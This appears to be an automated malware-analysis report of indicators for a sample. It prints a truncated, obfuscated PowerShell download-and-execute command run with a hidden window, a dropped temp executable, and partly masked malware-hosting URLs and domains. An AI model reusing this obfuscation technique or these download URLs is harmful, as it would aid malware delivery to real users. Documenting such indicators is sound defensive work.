Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " .( $enV:CoMspEc[4,15,25]-jOiN'') ([stRinG]::joIn( '',[char[]] ( 36, 97,106, 122 ,61, 110,101, 119 , 45, 111 , 98,106 , 101,99 , 116, 32 ,78 ,101 ,116 ,46 , 87 , 101 , 98, 67,108 ,105 ,101 , 1...
- %TEMP%\872.exe
- %TEMP%\872.exe
- 'es#####emocrata.com.br':80
- 'es#####emocrata.com.br':443
- 'pk#.goog':80
- 'j-##ill.ru':80
- http://www.es#####emocrata.com.br/wp-content/o0in4Y/
- http://pk#.goog/gsr1/gsr1.crt
- http://www.j-##ill.ru/kLp8gFsh/
- http://j-##ill.ru/kLp8gFsh/
- 'es#####emocrata.com.br':443
- DNS ASK es#####emocrata.com.br
- DNS ASK pk#.goog
- DNS ASK st###eforce.one
- DNS ASK sh####lisharma.com
- DNS ASK j-##ill.ru
- DNS ASK sh#####kskitchen.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " .( $enV:CoMspEc[4,15,25]-jOiN'') ([stRinG]::joIn( '',[char[]] ( 36, 97,106, 122 ,61, 110,101, 119 , 45, 111 , 98,106 , 101,99 , 116, 32 ,78 ,101 ,116 ,46 , 87 , 101 , 98, 67,108 ,105 ,101 , 1...' (with hidden window)